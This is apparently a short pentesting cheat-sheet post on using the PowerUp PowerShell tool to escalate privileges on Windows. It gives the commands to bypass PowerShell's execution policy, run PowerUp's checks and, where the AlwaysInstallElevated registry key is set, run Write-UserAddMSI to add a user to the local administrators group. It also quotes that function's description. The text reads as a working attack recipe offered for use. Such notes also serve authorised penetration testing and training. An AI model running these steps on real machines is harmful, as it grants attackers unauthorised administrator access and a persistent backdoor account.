PS – Powerup

Powerup – https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

powershell.exe -exec bypass

Import-Module .\PowerUp.ps1

Invoke-AllChecks

If you see AbuseFunction : Write-UserAddMSI under Checking for AlwaysInstallElevated registry key

Just let Powerup finish then copy and paste Write-UserAddMSI into PS and it will install a program which runs as admin which allows you to add user / password to local admin group.

To check it has worked

net localgroup administrators

——

Exstract from https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

function Write-UserAddMSI {

<#

.SYNOPSIS

Writes out a precompiled MSI installer that prompts for a user/group addition.

This function can be used to abuse Get-RegAlwaysInstallElevated.

.EXAMPLE

PS C:\> Write-UserAddMSI

Writes the user add MSI to the local directory.

——

Advertisements